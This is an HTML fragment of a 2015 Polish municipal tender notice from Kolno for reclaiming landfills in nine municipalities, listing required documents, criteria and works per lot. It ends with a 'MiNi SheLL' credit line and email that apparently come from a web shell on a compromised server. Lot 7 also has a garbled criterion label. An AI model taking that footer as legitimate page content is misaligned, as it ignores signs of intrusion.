<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.kolno.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kolno ul. Wojska Polskiego 20 18-500 Kolno pok. 116..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2015 godzina 10:00, miejsce: Urząd Miasta Kolno ul. Wojska Polskiego 20 18-500 Kolno pok. 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 19.07.2015.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Gmina Filipów - miejscowość Filipów Trzeci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Ułożenie warstwy wyrównawczej 15 cm
Wykonanie studni nowoprojektowanych SG-3-10
Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 40 cm
Wykonanie warstwy rekultywacyjnej okrywowej na terenie zrekultywowanego składowiska (ukształtowanie 35 cm warstwy glebotwórczej)
Montaż reperu kontrolnego
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 4.
Zadarnienie, zadrzewienie i zakrzewienie
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Gmina Grabowo - miejscowość Golanki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Roboty drogowe przy wykonaniu drogi z płyt żelbetowych
Roboty przed wykonaniem warstwy rekultywacyjnej
Wykonanie studni odgazowujących oraz obwałowania składowiska
Wykonanie warstwy rekultywacyjnej
Montaż repera kontrolnego
Wykonanie rowów odwadniających
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 2, 3.
Zadarnienie, zadrzewienie i zakrzewienie
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-9, 45.22.21.10-3, 77.21.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3. Gmina Hajnówka - miejscowość Stare Berezowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Podniesienie istniejących studni odciekowych poprzez zainstalowanie dodatkowych kręgów betonowych
Wykonanie studni nowoprojektowanych
Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
Wykonanie warstwy rekultywacyjnej 	okrywowej na terenie zrekultywowanego składowiska
Montaż reperu kontrolnego
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1,4,5.
Zadarnienie, zadrzewienie i zakrzewienie
Wykonanie ogrodzenia z siatki
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.21.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4. Miasto Kolno - miejscowość Kolno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty przygotowawcze na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Wykonanie studni odgazowujących
Ułożenie warstwy wyrównawczej
Ułożenie warstwy odgazowujacej ze żwiru
Uszczelnienie warstwy rekultywacji np. bentomatą
Ułożenie warstwy odwadniajacej ze żwiru
Wykonanie warstwy rekultywacyjnej okrywowej (ukształtowanie 35 cm warstwy glebotwórczej + 5 cm hummusu)
Montaż repera kontrolnego
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 5 szt. Wzór: 1, 2, 3, 4, 5.
Zadarnienie, zadrzewienie i zakrzewienie
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5. Gmina Krypno - miejscowość Zastocze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace przygotowawcze na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Ułożenie warstwy wyrównawczej 25 cm
Wykonanie studni nowoprojektowanych sg-3-10
Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
Wykonanie warstwy rekultywacyjnej okrywowej
Montaż repera kontrolnego
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 4.
Zadarnienie, zadrzewienie i zakrzewienie
Naprawa bram
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6. Gmina Kulesze Kościelne - miejscowość Czarnowo Biki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe  na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Wykonanie studni odgazowujących
Formowanie skarp i wierzchowiny składowiska wraz z dowiezionymi przez Inwestora odpadami
Wykonanie warstwy rekultywacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 25 cm
Wykonanie warstwy rekultywacyjnej (ukształtowanie 35 cm warstwy glebotwórczej zmieszanej z osadami ściekowymi o czaszy ukształtowanej opływowo na zewnątrz terenu rekultywowanego)
Montaż głowicy repera
Zadarnienie, zadrzewienie i zakrzewienie
Wykonanie rowów odwadniajacych wokół składowiska
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 2, 3.
Rozbiórka ogrodzenia z bramą
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7. Gmina Nowogród - miejscowość Nowogród.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty przygotowawcze i rozbiórkowe na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Ułożenie warstwy wyrównawczej
Wykonanie studni nowoprojektowanych odgazowujących
Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
	Wykonanie warstwy rekultywacyjnej okrywowej i humusowej
Montaż reperów kontrolnych
Wykonanie i montaż tablic edukacyjnych 5 szt. Wzór: 1, 2, 3, 4, 5.
Wykonanie ścieżki edukacyjnej
Zadarnienie, zadrzewienie i zakrzewienie
Wykonanie ogrodzenia z siatki
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. g - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8. Gmina Radziłów - miejscowość Radziłów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe na terenie składowiska odpadów
Roboty geodezyjne na terenie składowiska odpadów
Wykonanie studni odgazowujących
Połączenie istniejącej studni na odcieki ze studnią kontrolną
Formowanie skarp i wierzchowiny składowiska wraz z dowiezionymi przez Inwestora odpadami
Wykonanie warstwy rekultywacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 25 cm
Wykonanie warstwy rekultywacyjnej (ukształtowanie 35 cm warstwy glebotwórczej zmieszanej z osadami ściekowymi o czaszy ukształtowanej opływowo na zewnątrz terenu rekultywowanego)
Montaż głowicy repera
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 5.
Zadarnienie, zadrzewienie i zakrzewienie
Wykonanie rowów odwadniających wokół wydzielonej części składowiska odpadów
Rozbiórka ogrodzenia z bramą
Dokumenty powykonawcze
Istniejące na składowisku budynki pozostają bez zmian
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9. Gmina Zbójna - miejscowość Pianki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty rozbiórkowe na terenie składowiska odpadów
Formowanie skarp i wierzchowiny składowiska
Roboty geodezyjne na terenie składowiska odpadów
Ułożenie warstwy wyrównawczej
Wykonanie studni nowoprojektowanych
Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
Wykonanie warstwy rekultywacyjnej okrywowej
Montaż repera
Wykonanie ścieżki edukacyjnej
Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 3, 5.
Zadarnienie, zadrzewienie i zakrzewienie
Dokumenty powykonawcze
W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com